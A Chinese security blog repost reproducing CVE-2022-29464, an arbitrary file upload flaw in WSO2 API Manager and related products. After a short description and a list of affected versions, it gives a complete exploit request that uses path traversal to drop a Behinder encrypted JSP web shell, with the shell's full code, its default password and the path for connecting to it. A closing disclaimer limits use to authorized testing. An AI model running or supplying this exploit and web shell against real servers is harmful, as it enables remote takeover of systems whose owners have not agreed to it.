本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-CVE-2022-29464-WSO2 任意文件上传漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
WSO2APIManager是一款可以旨在提供优秀的API管理功能的开源产品,能够实现API的创建、发布、生命周期管理、流量控制、版本控制、治理和安全控制等功能。已用于WSO2EnterpriseServiceBus、WSO2IdentityServer和WSO2GovernanceRegistry等产品中。WSO2APIManager可以为开发团队提供Web页面进行部署、管理和监控API,服务消费者可以进行服务发现、服务订阅以及服务调用。APIM的KeyManager组件默认通信协议是ApacheThrift,另外,APIM可以通过集成WSO2Analytic平台实现API调用监控及告警。融云安全监测到WSO2 API Manager中存在任意文件上传和远程代码执行漏洞。该漏洞源于某些 WSO2 产品中对用户输入的验证不当,攻击者可以将任意文件上传到服务器的任意位置。通过利用任意文件上传漏洞,可以进一步在服务器上实现远程代码执行。
![图片[1]--CVE-2022-29464-WSO2 任意文件上传漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd180425.png)
0x03 漏洞复现
漏洞影响:
- WSO2 API Manager 2.2.0 and above
- WSO2 Identity Server 5.2.0 and above
- WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0
- WSO2 Identity Server as Key Manager 5.3.0 and above
- WSO2 Enterprise Integrator 6.2.0 and above
1.构造poc上传冰蝎马2.jsp,返回200上传成功
POST /fileupload/toolsAny HTTP/1.1
Host: x.x.x.x:23843
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 900
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/2.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/2.jsp"
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
--4ef9f369a86bfaadf5ec3177278d49c0--![图片[2]--CVE-2022-29464-WSO2 任意文件上传漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd180531.png)
2.冰蝎连接,得到一个shell
http://x.x.x.x:23843/authenticationendpoint/2.jsp #路径,默认密码为rebeyond![图片[3]--CVE-2022-29464-WSO2 任意文件上传漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd180549.png)
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END
请登录后查看评论内容